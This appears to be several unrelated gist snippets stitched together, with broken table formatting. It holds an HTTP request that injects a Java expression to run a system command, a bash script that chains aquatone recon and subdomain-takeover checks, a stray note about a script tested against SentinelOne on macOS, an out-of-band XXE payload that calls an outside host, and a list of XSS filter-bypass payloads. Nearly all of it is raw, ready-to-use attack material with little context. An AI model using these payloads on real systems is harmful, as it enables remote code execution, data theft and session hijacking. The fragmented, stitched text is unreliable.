| POST /users HTTP/1.1 | |
| Host: localhost:8080 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 164 | |
| username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
| #!/bin/bash | |
| aquatone-discover -d $1 --threads 10 | |
| aquatone-scan -d $1 --ports huge --threads 10 | |
| DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10 | |
| aquatone-takeover -d $1 --threads 10 |
This was only tested on a 'partial' SentinelOne installation on the High Sierra beta, where SentinelOne was never allowed to enable it's kernel extension. (Some things failed while I was messing around with OS betas.)
A lot happens in 2+ years, at this point there's a good chance this script will do more harm than good. Read the comments before using!
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |